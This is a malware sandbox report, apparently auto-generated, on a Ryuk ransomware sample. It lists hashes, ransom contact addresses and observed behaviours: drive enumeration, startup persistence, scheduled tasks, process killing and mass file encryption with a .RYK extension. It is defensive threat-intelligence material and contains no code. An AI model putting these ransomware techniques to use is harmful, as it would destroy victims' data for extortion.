Analysis
-
max time kernel
151s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
11-03-2023 01:49
Static task
static1
Behavioral task
behavioral1
Sample
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
Resource
win10v2004-20230221-en
General
-
Target
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
-
Size
767KB
-
MD5
d2e194259106bca3b42dc8690d340b59
-
SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b
-
SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
-
SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13
-
SSDEEP
12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Vulcanteam@CYBERFEAR.COM
vulcanteam@inboxhub.net
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exedescription ioc process File opened (read-only) \??\O: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\S: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\T: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\I: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\J: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\K: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\L: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\N: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\U: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\A: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\V: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\Z: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\E: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\F: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\G: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\H: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\M: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\Q: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\W: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\Y: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\B: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\P: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\R: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened (read-only) \??\X: 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe -
Drops file in Program Files directory 64 IoCs
Processes:
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\wordEtw.man.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\YEAR.XSL.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\QuizShow.potx.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\iw_get.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Roundrect_White@1x.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xsl.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYH.TTC.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\LTSHYPH_EN.LEX.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDCLIL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@2x.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluError_136x136.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2String.XSL.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART3.BDR.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning@3x.png.[Vulcanteam@CYBERFEAR.COM].RYK 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4312 schtasks.exe 4000 schtasks.exe 2904 schtasks.exe 4428 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1792 taskkill.exe 1428 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exepid process 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe 2124 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe -
